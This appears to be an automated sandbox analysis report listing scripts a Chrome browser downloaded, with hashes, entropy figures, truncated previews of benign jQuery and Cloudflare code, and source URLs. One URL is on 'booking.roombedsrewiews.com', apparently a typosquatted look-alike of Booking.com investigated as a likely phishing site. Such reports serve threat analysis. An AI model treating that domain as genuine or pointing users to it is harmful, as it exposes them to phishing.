                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1239
                                                                                                                                                                                                                        Entropy (8bit):5.068464054671174
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                                                                                                                                                        SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                                                                                                                                                        SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                                                                                                                                                        SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://booking.roombedsrewiews.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                                                                                                                                                        Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (64779)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):104629
                                                                                                                                                                                                                        Entropy (8bit):5.417643579841533
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:95C8526E7C18736CC0287A95E4BBABA6
                                                                                                                                                                                                                        SHA1:D9EADF6817099B29512CFA40B21DAD4EF760746D
                                                                                                                                                                                                                        SHA-256:CCA3D74F0BA1056F36CE157EDB8A9F95437B5D20991616589D2E3B1901B8EB65
                                                                                                                                                                                                                        SHA-512:B58EA0A382B25917D56051077F7D43C86104D9DEC32F75505E14EDF2D5C8B4229A0C44EFEA793131FF0F2D087482998EA0F4B54B7CD7FBF24AD03CE85D1DD393
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/CoreModule.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34313)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):806001
                                                                                                                                                                                                                        Entropy (8bit):5.505058674190165
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:04D1F1D9CE7E0391F7D34D97128C8AB0
                                                                                                                                                                                                                        SHA1:4EE1B63773106FF15A81DCABAF1B54F05A3A4A80
                                                                                                                                                                                                                        SHA-256:313438105948E091A392E6DF9C4704ABD398ED4829C7A73E72FF2D69A2A97D08
                                                                                                                                                                                                                        SHA-512:7B7959EEBA111DFC83A7D429A23E653E780AFD95F221D05643055D6A178AE43F1EFC1CC0523F6DE334E384F238BC643FD10280D44371FB7D7359276A86164BC2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-TGMJRCB
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28874)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):29728
                                                                                                                                                                                                                        Entropy (8bit):5.207704866341386
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:3B30454A1210F870F9CCD8FA13CE90E3
                                                                                                                                                                                                                        SHA1:35279080A8AE2F9FA0ED97710E60D2D70ACAFF80
                                                                                                                                                                                                                        SHA-256:B7F96797CF0DC8F26BF80BEF507D5C378A6409433346538A488C5BCF468597A0
                                                                                                                                                                                                                        SHA-512:D9ADE6EDF23661F6E2C5878E39F9AE60527757671835B7A69B29F3FF531960BE327A4164FD3A75630C46EAD6A775BB5944474A741C8965C7A8E01A200EB79356
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/1.63482081f3bf73c57075.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2047)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2901
                                                                                                                                                                                                                        Entropy (8bit):5.242251867822457
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4B0A0CC77E429CC06DEFF2E7D65AB5EF
                                                                                                                                                                                                                        SHA1:87908D4FBBBED59447FE9F748AA23481D4D95ABB
                                                                                                                                                                                                                        SHA-256:91E73EE015BDC4C4B91119C0CE96F364FB826026CA45CA49BAB326C59497FFF6
                                                                                                                                                                                                                        SHA-512:47801F1DC93087FE1E0786BDBE4753C913DDDBF4E5A84D5417F873C28FD8A3EC7D3D172E8B8DB1F5DCDA6F13E2033DD245EA13F28479DE464D4AE485B7F6C4A8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/5.76657644fe1b73dc4306.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking
                                                                                                                                                                                                                        No static file info